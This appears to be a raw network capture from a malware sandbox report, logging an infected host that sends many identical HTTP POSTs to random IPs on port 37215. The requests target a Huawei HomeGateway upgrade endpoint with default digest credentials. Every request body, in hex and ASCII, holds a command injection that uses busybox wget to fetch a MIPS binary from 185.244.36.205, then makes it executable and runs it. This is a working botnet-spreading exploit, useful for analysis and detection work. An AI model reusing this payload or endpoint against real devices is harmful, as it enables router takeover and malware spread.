                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1636192.168.2.1545420186.88.26.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646111965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1637192.168.2.1560002222.228.236.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646111965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1638192.168.2.155489645.233.194.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646146059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1639192.168.2.1557192190.201.60.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646146059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1640192.168.2.1558610156.171.191.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646157026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1641192.168.2.1546256186.177.98.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646188974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1642192.168.2.1550958186.31.62.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646224022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1643192.168.2.154250041.92.121.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646239042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1644192.168.2.1542730197.69.217.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646275997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1645192.168.2.1560368186.128.116.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646281004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1646192.168.2.1534152138.37.84.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646316051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
